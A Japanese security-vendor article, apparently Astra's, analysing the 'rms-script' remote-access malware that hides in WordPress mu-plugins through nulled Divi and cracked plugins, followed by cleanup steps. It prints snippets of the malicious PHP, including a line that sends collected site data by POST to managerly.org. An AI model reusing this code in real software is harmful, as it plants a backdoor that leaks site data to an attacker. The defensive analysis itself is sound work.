ネットワークセキュリティ
 Computer >> コンピューター >  >> ネットワーキング >> ネットワークセキュリティ

【修正】WordPress「rms-script」リモートアクセスマルウェアの実態と対処法

最近、一部のWordPressサイトにおいて、外部サイトへのリモートアクセスを許してしまうマルウェアが確認されました。このマルウェアは、wp-content/mu-pluginsフォルダ内に配置された複数のPHPファイルに潜んでいることが判明しています。しかも厄介なことに、無料のWordPressセキュリティプラグインでサイトをスキャンしても、異常は一切検出されませんでした。本記事では、このマルウェアの詳細と、感染した場合の具体的な対処方法について詳しく解説します。

rms-scriptマルウェアの挙動

最初に気づくのは、WordPressサイトに奇妙なエラーが表示されることです。このエラーの原因こそがリモートアクセスマルウェアであり、その発生源はwp-content/mu-pluginsフォルダ内にある不審なPHPファイルであることが突き止められました。

マルウェアスキャンを実施しても、このリモートアクセスマルウェアの痕跡はまったく検出されません。しかし、PHPファイルを詳細に調査したところ、コードが外部サイト「managerly.org」に対するリモートログイン権限を付与していることが判明しました。つまり、攻撃者があなたのサイトに遠隔から侵入できる状態を作り出していたのです。

実際に発見された悪意あるrms-scriptのPHPコード全文は、公開元で確認することができます。

マルウェアのさらなる調査結果

サイト内のプラグインを調べ、不審なPHPファイル(rms-script-mu-plugin.php および rms-script-ini.php)への参照を探したところ、クラックされた(海賊版)プラグインにこのマルウェアが含まれている可能性があることが分かりました。また、サンプルサイトで使用されていたヌル化(nulled)版Diviテーマのフォルダからも、これらファイルの痕跡が発見されています。該当フォルダを削除すると、スクリプトの動作は停止しました。

以下は、クラック済みプラグイン内で見つかった、2つの悪意あるPHPスクリプトを読み込むコードの一部です。

require_once('rms-script-ini.php');
rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);

続いて、その直後に記述されていたコードスニペットがこちらです。

$GLOBALS['rms_report_to']            =   'https://managerly.org/wp-admin/admin-ajax.php';

$args=
[
    'method'      => 'POST',
    'timeout'     => 15,
    'redirection' => 15,
    'headers'     => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
    'body'        => $body
];
// Send to RMS
$curl   = new Wp_Http_Curl();
$result=$curl->request($connect_to, $args);
$result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;

このコードは、設置されたウェブサイトからデータを収集し、それを外部サイトへ送信する仕組みになっています。要するに、サイトのデータをmanagerly.orgへ送り出すリモートアクセスマルウェアであり、被害は深刻になりかねません。詳細は次のセクションで説明します。

さらにmanagerly.orgを分析したところ、以下の登録情報が明らかになりました。

  • 登録組織名: Wuxi Yilian LLC
  • 登録地域: 福建省(中国)
  • ネームサーバー: LARS.NS.CLOUDFLARE.COM、ASHLEY.NS.CLOUDFLARE.COM
  • DNSSEC: 未署名

この登録組織名で検索すると、Reddit上にも多数の投稿が見つかります。どうやらこのLLCは実在しない偽装企業であり、他の詐欺行為にも関与しているようです。

このマルウェアが危険な理由

リモートアクセスマルウェアによる攻撃では、攻撃者があなたのウェブサイトへのアクセス権を取得し、スパム配信やフィッシングなど、自身の悪意あるキャンペーンに利用できるようになります。最悪の場合、サイトのコントロールを完全に失い、機密データが攻撃者に漏えいしてしまう恐れもあります。

今回のケースでは、攻撃者はrms-scriptリモートアクセスマルウェアを通じてWordPressアカウントを乗っ取ろうとしています。さらに厄介なことに、このハッキング手法はパスワードを変更しても回避できない可能性があります。

注意すべき点として、無料のセキュリティツールではこのマルウェアを検出できないため、再発のリスクが非常に高いということが挙げられます。サイト全体を入念にチェックし、不審なファイルがないか確認するとともに、可能な限りセキュリティ対策を強化してください。

特に、wp-content/mu-pluginsフォルダや、Diviテーマをインストールしている場合はそのテーマフォルダ内に、悪意のあるPHPファイルが紛れ込んでいないか必ず確認しましょう。

WordPressサイトの修復手順

1. クリーンアップ前にサイトのバックアップを取得する

作業中にユーザーが感染ページへアクセスしないよう、まずサイトを一時的にオフラインにすることをおすすめします。その上で、すべてのコアファイルとデータベースのバックアップを必ず取得してください。バックアップは.zip形式など、圧縮ファイル形式で保存しておくと安心です。

2. ヌル化・クラック版のプラグインをすべて削除する

多くのプラグインやテーマ、とりわけDiviテーマのクラック版・ヌル化版には、このリモートアクセスマルウェアが仕込まれています。Stack Overflowの回答でも、こうした不正版プラグインやテーマからマルウェアが検出された事例が報告されています。サイトからヌル化・クラック版のプラグインをすべて削除した後、必ずマルウェアスキャンを実行しましょう。以降は正規のプラグインとテーマのみを使用し、常に最新の状態に更新することで、脆弱性を放置しないようにしてください。

3. 不審なフォルダとファイルをすべて削除する

サイト内に悪意のある可能性があるファイルがないか精査し、見つけ次第すべて削除します。

関連ガイド:WordPressマルウェア除去の完全ガイド

4. マルウェアスキャンを実行する

マルウェアは日々進化していますが、スキャナー技術も同様に進歩しています。ウェブサーバー上で定期的にマルウェアスキャンを実行するのは、常に有効な対策です。ホスティング業者が提供するcPanelの「Virus Scanner」ツールを利用するか、Astra Proプランなどの専門家によるマルウェア除去サービスを活用しましょう。Astraのマルウェアスキャナーなら、このような悪意あるPHPファイルも確実に検出できます。

まとめ:wp-content/mu-pluginのリモートアクセスマルウェア対策

今回、WordPressサイトで発見されたリモートアクセスマルウェアは、主にヌル化またはクラック版のプラグインを使用していたサイトに潜んでいました。多くの人気マルウェアスキャナーでは検出されなかったものの、スキャナー自体は継続的に更新されているため、感染が疑われる場合はスキャンの実行をおすすめします。そして何より、正規のプラグイン・テーマのみを使用し、常に最新版に保つことが、サイトの安全を維持するための確実な方法です。

Astraについて

Astraは、ハッカーやインターネット上の脅威、ボットからサイトを守るための総合ウェブセキュリティスイートです。WordPress、OpenCart、Magentoなど主要CMSで稼働するウェブサイト向けにプロアクティブなセキュリティを提供しており、ハッキングやマルウェア感染に関するお問い合わせには、年中無休24時間体制のテクニカルサポートチームが対応いたします。

  1. WordPressのプッシュ通知マルウェアとリダイレクトハッキングへの対処方法

    ここ数週間、セキュリティ企業Astraの調査チームは、WordPressサイトで発生しているプッシュ通知型マルウェアを追跡しています。この攻撃キャンペーンは、WordPressサイトで継続的に発生しているリダイレクト(不正転送)キャンペーンと組み合わされて実行されています。 リダイレクト先として確認されている悪意のあるドメインには、inpagepush[.]com、asoulrox[.]com、iclickcdn[.]com、justcannabis[.]online、0.realhelpcompany[.]ga、fast.helpmart[.]ga/m[.]js?w=085 などがあります

  2. ハッキングされた WordPress Web サイト。 WordPress からウィルスを除去する方法

    WordPress サイトがハッキングされ、マルウェアに感染していませんか? あなたが初心者の場合、ハッキングを取り除くために何をすべきか、どのようにそれを行うべきかを決めるときに迷子になるかもしれません.開発の機会があったとしても、ハッキングを正確に見つけて削除することは依然として困難です。 したがって、ハッキングの検出と削除を実際に開始するためのこの広範なガイドをまとめました.この WordPress ハッカー除去ガイドでは、WordPress ハッカーの症状、検出手法、および除去プロセスについて説明します。このガイドでは、考えられる原因とハッキングの種類についても説明します。Word